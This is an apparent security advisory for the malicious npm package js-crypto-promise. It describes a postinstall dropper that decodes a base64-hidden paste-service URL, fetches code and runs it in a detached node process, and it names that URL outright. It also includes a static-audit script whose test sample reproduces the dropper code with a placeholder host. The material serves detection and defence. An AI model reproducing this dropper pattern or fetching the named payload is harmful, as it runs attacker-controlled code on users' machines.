Malicious package

js-crypto-promise (npm)

Malicious code in js-crypto-promise (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5569
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall js-crypto-promise

What this malware does

The package's prepinstall.js script base64-decodes a hidden URL stored in a constant misleadingly named HASH_KEY (it decodes to https://jsonkeeper.com/b/DWNFF, an anonymous paste service), fetches the JSON body with axios, reads its .cache field, and pipes the contents into a detached node child process over stdin:

const child = spawn('node', [], { detached: true, stdio: ['pipe', 'ignore', 'ignore'] });
child.stdin.write(k1);

This dropper runs automatically on npm install through scripts.postinstall. To defeat the --ignore-scripts mitigation, index.js also wraps a dynamic import('./prepinstall.js') in a top-level IIFE, so any consumer that calls require('js-crypto-promise') re-triggers the same remote fetch and execution. The payload host is mutable, anonymous, unpinned and unverified: the package author can swap in arbitrary code at any time.

The package name impersonates the legitimate crypto-promise package. The README copies the real package's example code and embeds the real package's npm badge link, and the homepage points at the legitimate maintainer's GitHub repo.

Installer impact: any npm install or require() of this package executes attacker-controlled Node.js code on the installer's machine.
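The behaviours described above (a lifecycle script, a base64-hidden URL constant, a detached node child fed over stdin, and an entry point that dynamically imports the install script) are all visible statically. The following audit is an added example, not O3 Security's tooling or anything from the package itself; the function names, the placeholder URL and the sample package contents are constructed for illustration, and it is meant to be run over an unpacked tarball before a dependency is allowed into a build.

```javascript
// Added example (not O3 Security's tooling): static audit for the install-time
// dropper shape described in this advisory. It flags lifecycle scripts,
// base64-encoded URL literals, a detached `node` child written to via stdin,
// and a dynamic import() of an install-script file from another module.
// The sample package and placeholder URL below are constructed, not real.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Return every quoted literal that is valid base64 and decodes to an http(s) URL.
function findBase64Urls(source) {
  const urls = [];
  const literal = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;
  let m;
  while ((m = literal.exec(source)) !== null) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^https?:\/\/\S+$/.test(decoded)) urls.push(decoded);
  }
  return urls;
}

// Files referenced by lifecycle scripts, e.g. "node prepinstall.js" -> "prepinstall.js".
function lifecycleScriptFiles(scripts) {
  const files = new Set();
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    for (const tok of cmd.split(/\s+/)) {
      if (/\.[cm]?js$/.test(tok)) files.add(tok.replace(/^\.\//, ''));
    }
  }
  return files;
}

// pkgJson: parsed package.json; sources: { "file.js": "<contents>" }.
// Returns a list of finding tags (empty when nothing matched).
function auditPackage(pkgJson, sources) {
  const findings = [];
  const scripts = pkgJson.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push(`lifecycle:${hook}`);
  }
  const installFiles = lifecycleScriptFiles(scripts);
  for (const [file, src] of Object.entries(sources)) {
    for (const url of findBase64Urls(src)) findings.push(`base64-url:${file}:${url}`);
    if (/spawn\(\s*['"]node['"]/.test(src) && /detached\s*:\s*true/.test(src)) {
      findings.push(`detached-node:${file}`);
    }
    if (/\.stdin\.write\(/.test(src)) findings.push(`stdin-eval:${file}`);
    // A dynamic import of the install script from any other module means
    // --ignore-scripts no longer protects consumers who require() the package.
    const dyn = /import\(\s*['"]\.\/([^'"]+)['"]\s*\)/g;
    let m;
    while ((m = dyn.exec(src)) !== null) {
      if (installFiles.has(m[1])) findings.push(`retrigger-on-require:${file}->${m[1]}`);
    }
  }
  return findings;
}

// A lifecycle hook combined with a hidden URL or a detached child is the
// dropper shape; a lifecycle script on its own is common and not flagged.
function isSuspicious(findings) {
  const hasHook = findings.some((f) => f.startsWith('lifecycle:'));
  const hasPayload = findings.some(
    (f) => f.startsWith('base64-url:') || f.startsWith('detached-node:'),
  );
  return hasHook && hasPayload;
}

// Constructed sample mimicking the advisory's description; the URL is a placeholder.
const PLACEHOLDER_URL = 'https://paste.example.invalid/b/PLACEHOLDER';
const SAMPLE_PKG = { name: 'sample-pkg', version: '1.0.1', scripts: { postinstall: 'node prepinstall.js' } };
const SAMPLE_SOURCES = {
  'prepinstall.js': [
    "const axios = require('axios');",
    "const { spawn } = require('child_process');",
    `const HASH_KEY = '${Buffer.from(PLACEHOLDER_URL).toString('base64')}';`,
    "const url = Buffer.from(HASH_KEY, 'base64').toString();",
    'axios.get(url).then((r) => {',
    "  const child = spawn('node', [], { detached: true, stdio: ['pipe', 'ignore', 'ignore'] });",
    '  child.stdin.write(r.data.cache);',
    '});',
  ].join('\n'),
  'index.js': "(async () => { await import('./prepinstall.js'); })();\nmodule.exports = {};",
};
const BENIGN_PKG = { name: 'benign', version: '2.0.0' };
const BENIGN_SOURCES = { 'index.js': 'module.exports = { add: (a, b) => a + b };' };

const sampleFindings = auditPackage(SAMPLE_PKG, SAMPLE_SOURCES);
console.log(sampleFindings.join('\n'));
console.log('suspicious:', isSuspicious(sampleFindings));
```

The heuristics are deliberately narrow: a lifecycle script by itself is normal (native addons use them routinely), so the verdict requires it to co-occur with a hidden URL or a detached child process. The `retrigger-on-require` tag is the one that matters for teams relying on `--ignore-scripts`, since that flag does nothing once the install script is reachable from the package entry point.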

Malicious versions

1 flagged
1.0.1

Indicators of compromise (SHA-256)

0f5a7a6c89bed501873fcf3ed3eee38f5198ef5224d71038324f3543380feb5e
a9d677e45bee46911d04564e9260f4b569119a4ca0a13a58bcd43760359fbb4f

Frequently asked questions

No. js-crypto-promise on npm has been identified as a malicious package (version 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005480
IN-MAL-2026-005479

Credits

  • Amazon Inspector · finder

js-crypto-promise (npm) malicious package — MAL-2026-5569 | O3 Security